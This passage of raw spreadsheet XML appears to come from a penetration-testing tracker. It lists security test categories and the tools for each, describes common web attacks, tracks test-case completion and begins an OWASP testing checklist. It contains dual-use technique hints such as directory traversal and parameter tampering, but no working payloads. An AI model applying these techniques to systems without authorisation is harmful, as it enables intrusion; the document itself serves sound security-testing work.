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nimkrishna\Downloads\chk\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{2960009D-F370-4A42-A43D-654281906D58}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10300" firstSheet="6" activeTab="8" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Security_Test_Category_&amp;_Tools" sheetId="1" r:id="rId1"/>
    <sheet name="Test_Case_Coverage_Status" sheetId="2" r:id="rId2"/>
    <sheet name="OWASP_Checklist" sheetId="3" r:id="rId3"/>
    <sheet name="Tools" sheetId="4" r:id="rId4"/>
    <sheet name="Tier_1" sheetId="5" r:id="rId5"/>
    <sheet name="Tier_2" sheetId="6" r:id="rId6"/>
    <sheet name="Android_Mobile_Tests" sheetId="7" r:id="rId7"/>
    <sheet name="iOS_Mobile_Tests" sheetId="8" r:id="rId8"/>
    <sheet name="API_Test_Cases" sheetId="9" r:id="rId9"/>
  </sheets>
  <calcPr calcId="144525"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2944" uniqueCount="1611">
  <si>
    <t>Sl No</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Information Gathering</t>
  </si>
  <si>
    <t>Google Hacking, Sitedigger, Shodan, FOCA, Punkspider, Httprint, Httprecon, Desenmascarame, Browser, curl, wget, Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue, Whatweb, BlindElephant, Wappalyzer, CMSmap, Browser, curl, wget</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>Browser, Nikto, Nessus, Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner, netcat</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Hydra</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Wfuzz</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>Burp Proxy, ForceSSL, ZAP, CookieDigger</t>
  </si>
  <si>
    <t>Data Validation Testing</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, BeEF, XSS Proxy, Xenotix XSS, netcat, Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB), Orascan, SQLInjector, SQLninja, Power Injector, Hibernate, Nhibernate, NoSQLMap, Wfuzz, Liffy, Panoptic, Commix, Immunity Canvas, Spike, MSF, Nessus, netcat</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>PadBuster, Poracle, python-paddingoracle, POET, testssl.sh, SSL Breacher, Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>Client Side Testing</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, FlashBang, Flare, Flasm, SWFScan, SWF Intruder, ClickjackingTool, WebSocket Client</t>
  </si>
  <si>
    <t>Input Validation</t>
  </si>
  <si>
    <t>Burp Proxy, OWASP ZAP</t>
  </si>
  <si>
    <t>System Output</t>
  </si>
  <si>
    <t>Data Storage</t>
  </si>
  <si>
    <t>MITMProxy, Wireshark, Nuclei, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Services and Websites</t>
  </si>
  <si>
    <t>Nuclei, MITMProxy</t>
  </si>
  <si>
    <t>Logging</t>
  </si>
  <si>
    <t>OWASP ZAP, Burp Proxy</t>
  </si>
  <si>
    <t>Unintended Security Disclosure Requirements</t>
  </si>
  <si>
    <t>Nuclei, ZAP, Burp Proxy</t>
  </si>
  <si>
    <t>Communication</t>
  </si>
  <si>
    <t>MITMProxy, SSLScan, testssl.sh, SSL Breacher, Nuclei</t>
  </si>
  <si>
    <t>Data Processing</t>
  </si>
  <si>
    <t>Data Protection</t>
  </si>
  <si>
    <t>System Configuration</t>
  </si>
  <si>
    <t>File Management</t>
  </si>
  <si>
    <t>Memory Management</t>
  </si>
  <si>
    <t>Coverage Status for Tier 1 ( Manual Test cases )</t>
  </si>
  <si>
    <t>Attack Name</t>
  </si>
  <si>
    <t>Attack Description</t>
  </si>
  <si>
    <t>Test Case ID</t>
  </si>
  <si>
    <t>Coverage</t>
  </si>
  <si>
    <t>Cross Site scripting ( XSS)</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_1.1</t>
  </si>
  <si>
    <t>Completed</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_1.2</t>
  </si>
  <si>
    <t>HTML Injection</t>
  </si>
  <si>
    <t xml:space="preserve">HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. </t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_2.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_2.2</t>
  </si>
  <si>
    <t>HTTP Parameter Pollution</t>
  </si>
  <si>
    <t>HTTP Parameter Pollution, as implied by the name, pollutes the HTTP parameters of a web application in order to perform or achieve a specific malicious task/attack different from the intended behavior of the web application.
This hacking technique is considered to be simple, but quite effective. Furthermore, the main reason this attack can be realized is because the input is not sanitized properly. HPP injects encoded query string delimiters in existing or other HTTP parameters (i.e. GET/POST/Cookie), which make it feasible to supersede parameter values that already exist to inject a new parameter or exploit variables from direct access. This attack affects all web technologies, whether running client-side or server-side.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_3.1</t>
  </si>
  <si>
    <t>Buffer Overflow</t>
  </si>
  <si>
    <t>A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_4.1</t>
  </si>
  <si>
    <t>Click Jacking</t>
  </si>
  <si>
    <t>Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page.If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_5.1</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_6.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_6.2</t>
  </si>
  <si>
    <t>File upload</t>
  </si>
  <si>
    <t>Various web applications allow users to upload files (such as pictures, images, sounds, ...). Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_7.1</t>
  </si>
  <si>
    <t>URL Redirection</t>
  </si>
  <si>
    <t>Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_8.1</t>
  </si>
  <si>
    <t>Command Injection</t>
  </si>
  <si>
    <t>Command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_9.1</t>
  </si>
  <si>
    <t>Coverage Status for Tier 2 ( Test cases required tools)</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_1.1</t>
  </si>
  <si>
    <t>Host Header Attack</t>
  </si>
  <si>
    <t>In many cases, developers are trusting the HTTP Host header value and using it to generate links, import scripts and even generate password resets links with its value. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels like password reset emails.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_2.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_2.2</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_2.3</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_3.1</t>
  </si>
  <si>
    <t>Parameter Tampering</t>
  </si>
  <si>
    <t>The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control.This attack can be performed by a malicious user who wants to exploit the application for their own benefit, or an attacker who wishes to attack a third-person using a Man-in-the-middle attack. In both cases, tools likes Webscarab and Paros proxy are mostly used.The attack success depends on integrity and logic validation mechanism errors, and its exploitation can result in other consequences including XSS, SQL Injection, file inclusion, and path disclosure attacks.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_4.1</t>
  </si>
  <si>
    <t>File Inclusion</t>
  </si>
  <si>
    <t>The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:
1. Code execution on the web server
2. Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
3. Denial of Service (DoS)
4. Sensitive Information Disclosure</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_5.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_5.2</t>
  </si>
  <si>
    <t>File Upload</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_6.1</t>
  </si>
  <si>
    <t>Source Code Disclosure</t>
  </si>
  <si>
    <t>Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_7.1</t>
  </si>
  <si>
    <t>Critical File Found</t>
  </si>
  <si>
    <t>A possible sensitive file can contain common sensitive resources like password files, configuration files, log files, include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_8.1</t>
  </si>
  <si>
    <t>Missing SPF
(Sender Policy Framework)</t>
  </si>
  <si>
    <t>When a domain lacks an SPF policy, an attacker is able to send spoofed emails that look like they’re originating from the vulnerable domain.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_9.1</t>
  </si>
  <si>
    <t>DMARC Policy</t>
  </si>
  <si>
    <t xml:space="preserve">DMARC is designed to fit into an organization’s existing inbound email authentication process. The way it works is to help email receivers determine if the purported message “aligns” with what the receiver knows about the sender. If not, DMARC includes guidance on how to handle the “non-aligned” messages. </t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_10.1</t>
  </si>
  <si>
    <t>Insecure CORS</t>
  </si>
  <si>
    <t>An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.
If an application allows interaction from all subdomains, then this significantly increases its attack surface. For example, a cross-site scripting (XSS) vulnerability in any subdomain could potentially compromise the application that publishes the policy. Some consumer ISPs return custom content when requests are made to unregistered subdomains, which can introduce XSS vulnerabilities even if all of an organization's own applications are secure.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_11.1</t>
  </si>
  <si>
    <t>Password Reset Token Leakage</t>
  </si>
  <si>
    <t>Password reset code can be leaked to third party sites which is an issue knowing the fact that it can allow any malicious users to use the token and reset the passwords of the victim.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_12.1</t>
  </si>
  <si>
    <t>Server Side Request Forgery
(SSRF)</t>
  </si>
  <si>
    <t>Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. Criminals usually use SSRF attacks to target internal systems that are behind firewalls and are not accessible from the external network. An attacker may also leverage SSRF to access services available through the loopback interface (127.0.0.1) of the exploited server.
SSRF vulnerabilities occur when an attacker has full or partial control of the request sent by the web application. A common example is when an attacker can control the third-party service URL to which the web application makes a request.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_13.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_14.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_14.2</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_15.1</t>
  </si>
  <si>
    <t>Account Lockout</t>
  </si>
  <si>
    <t>Normally, a lockout policy is used during authentication to prevent attackers from attempting a large number of passwords on a given account. However, in an account lockout attack, this security mechanism is used by an attacker to cause a denial of service condition. If the attacker can exhaust the invalid login attempt limit for a given account, that account may be locked out against the owner's wishes.This attack is especially powerful if the attacker can guess a large number of usernames or account numbers for a scripted attack on many users.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_16.1</t>
  </si>
  <si>
    <t>No Rate Limiting</t>
  </si>
  <si>
    <t>This is a logical flaw not a DOS attack by replaying forgot password request, it will send you many emails or otp's.
There should be some rate limit</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_17.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_17.2</t>
  </si>
  <si>
    <t>Cross Site Request Forgery
(CSRF)</t>
  </si>
  <si>
    <t>Cross-site Request Forgery (CSRF/XSRF), refers to an attack against authenticated web applications using cookies. The attacker is able to trick the victim into making a request that the victim did not intend to make. Therefore, the attacker abuses the trust that a web application has for the victim’s browser. While Cross-site Request Forgery (CSRF) attacks do not provide an attacker with the response returned from the server, a clever attacker could cause a fair amount of damage, especially when paired with well-crafted social engineering attack on administrative users.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_18.1</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_18.2</t>
  </si>
  <si>
    <t>Hostile Subdomain Takeover</t>
  </si>
  <si>
    <t xml:space="preserve">Subdomain takeover is a process of registering a non-existing domain name to gain control over another domain. The most common scenario of this process follows:
1. Domain name (e.g., sub.example.com) uses a CNAME record to another domain (e.g., sub.example.com CNAME anotherdomain.com).
2. At some point in time, anotherdomain.com expires and is available for registration by anyone.
3. Since the CNAME record is not deleted from example.com DNS zone, anyone who registers anotherdomain.com has full control over sub.example.com until the DNS record is present.
The implications of the subdomain takeover can be pretty significant. Using a subdomain takeover, attackers can send phishing emails from the legitimate domain, perform cross-site scripting (XSS), or damage the reputation of the brand which is associated with the domain. </t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_19.1</t>
  </si>
  <si>
    <t>Not Completed</t>
  </si>
  <si>
    <t>Apache struts rce</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_20</t>
  </si>
  <si>
    <t>Idor</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_21</t>
  </si>
  <si>
    <t>Cryptographic Vulnerabilities</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_22</t>
  </si>
  <si>
    <t>Application server vulnerabilities</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_23</t>
  </si>
  <si>
    <t>Exposed Source code</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_24</t>
  </si>
  <si>
    <t>Emerging Attack Vectors(DOM Clobbering,PHP Object Injection, Relative Path Overwrite, UI Redressing)</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_25</t>
  </si>
  <si>
    <t>OWASP: Security Testing Guide Checklist</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t>OTG-INFO-001</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery and Reconnaissance for Information Leakage</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t>Google Hacking, Sitedigger, Shodan, FOCA, Punkspider</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>OTG-INFO-002</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t>Httprint, Httprecon, Desenmascarame</t>
  </si>
  <si>
    <t>OTG-INFO-003</t>
  </si>
  <si>
    <t>Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Analyze robots.txt and identify &lt;META&gt; Tags from website.</t>
  </si>
  <si>
    <t>Browser, curl, wget</t>
  </si>
  <si>
    <t>OTG-INFO-004</t>
  </si>
  <si>
    <t>Enumerate Applications on Webserver</t>
  </si>
  <si>
    <t>Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t>Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue</t>
  </si>
  <si>
    <t>OTG-INFO-005</t>
  </si>
  <si>
    <t>Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t>Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t>OTG-INFO-006</t>
  </si>
  <si>
    <t>Identify application entry points</t>
  </si>
  <si>
    <t>Identify from hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t>Burp proxy, ZAP, Tamper data</t>
  </si>
  <si>
    <t>OTG-INFO-007</t>
  </si>
  <si>
    <t>Map execution paths through application</t>
  </si>
  <si>
    <t>Map the target application and understand the principal workflows.</t>
  </si>
  <si>
    <t>Burp proxy, ZAP</t>
  </si>
  <si>
    <t>OTG-INFO-008</t>
  </si>
  <si>
    <t>Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t>Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer</t>
  </si>
  <si>
    <t>OTG-INFO-009</t>
  </si>
  <si>
    <t>Fingerprint Web Application</t>
  </si>
  <si>
    <t>Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer, CMSmap</t>
  </si>
  <si>
    <t>OTG-INFO-010</t>
  </si>
  <si>
    <t>Map Application Architecture</t>
  </si>
  <si>
    <t>Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t>OTG-CONFIG-001</t>
  </si>
  <si>
    <t>Test Network/Infrastructure Configuration</t>
  </si>
  <si>
    <t>Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.</t>
  </si>
  <si>
    <t>Nessus</t>
  </si>
  <si>
    <t>OTG-CONFIG-002</t>
  </si>
  <si>
    <t>Test Application Platform Configuration</t>
  </si>
  <si>
    <t>Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.</t>
  </si>
  <si>
    <t>Browser, Nikto</t>
  </si>
  <si>
    <t>OTG-CONFIG-003</t>
  </si>
  <si>
    <t>Test File Extensions Handling for Sensitive Information</t>
  </si>
  <si>
    <t>Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)</t>
  </si>
  <si>
    <t>OTG-CONFIG-004</t>
  </si>
  <si>
    <t>Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t>Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t>Nessus, Nikto, Wikto</t>
  </si>
  <si>
    <t>OTG-CONFIG-005</t>
  </si>
  <si>
    <t>Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t>Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner</t>
  </si>
  <si>
    <t>OTG-CONFIG-006</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>netcat, curl</t>
  </si>
  <si>
    <t>OTG-CONFIG-007</t>
  </si>
  <si>
    <t>Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t>Identify HSTS header on Web server through HTTP response header. 
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, curl</t>
  </si>
  <si>
    <t>OTG-CONFIG-008</t>
  </si>
  <si>
    <t>Test RIA cross domain policy</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Nikto</t>
  </si>
  <si>
    <t>OTG-IDENT-001</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>OTG-IDENT-002</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t>OTG-IDENT-003</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t>OTG-IDENT-004</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>Browser, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>OTG-IDENT-005</t>
  </si>
  <si>
    <t>Testing for Weak or unenforced username policy</t>
  </si>
  <si>
    <t>User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t>OTG-IDENT-006</t>
  </si>
  <si>
    <t>Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t>Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t>OTG-IDENT-007</t>
  </si>
  <si>
    <t>Test Account Suspension/Resumption Process</t>
  </si>
  <si>
    <t>Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.</t>
  </si>
  <si>
    <t>OTG-AUTHN-001</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t>OTG-AUTHN-002</t>
  </si>
  <si>
    <t>Testing for default credentials</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t>OTG-AUTHN-003</t>
  </si>
  <si>
    <t>Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t>Browser</t>
  </si>
  <si>
    <t>OTG-AUTHN-004</t>
  </si>
  <si>
    <t>Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>OTG-AUTHN-005</t>
  </si>
  <si>
    <t>Test remember password functionality</t>
  </si>
  <si>
    <t>Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t>OTG-AUTHN-006</t>
  </si>
  <si>
    <t>Testing for Browser cache weakness</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Firefox add-on CacheViewer2</t>
  </si>
  <si>
    <t>OTG-AUTHN-007</t>
  </si>
  <si>
    <t>Testing for Weak password policy</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t>OTG-AUTHN-008</t>
  </si>
  <si>
    <t>Testing for Weak security question/answer</t>
  </si>
  <si>
    <t>Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t>OTG-AUTHN-009</t>
  </si>
  <si>
    <t>Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t>OTG-AUTHN-010</t>
  </si>
  <si>
    <t>Testing for Weaker authentication in alternative channel</t>
  </si>
  <si>
    <t>Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)</t>
  </si>
  <si>
    <t>OTG-AUTHZ-001</t>
  </si>
  <si>
    <t>Testing Directory traversal/file include</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t>OTG-AUTHZ-002</t>
  </si>
  <si>
    <t>Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>Burp Proxy (Autorize), ZAP</t>
  </si>
  <si>
    <t>OTG-AUTHZ-003</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>OTG-AUTHZ-004</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>OTG-SESS-001</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t>OTG-SESS-002</t>
  </si>
  <si>
    <t>Testing for Cookies attributes</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>OTG-SESS-003</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>OTG-SESS-004</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>OTG-SESS-005</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>Burp Proxy (csrf_token_detect), burpy, ZAP</t>
  </si>
  <si>
    <t>OTG-SESS-006</t>
  </si>
  <si>
    <t>Testing for logout functionality</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>OTG-SESS-007</t>
  </si>
  <si>
    <t>Test Session Timeout</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>OTG-SESS-008</t>
  </si>
  <si>
    <t>Testing for Session puzzling</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>OTG-INPVAL-001</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
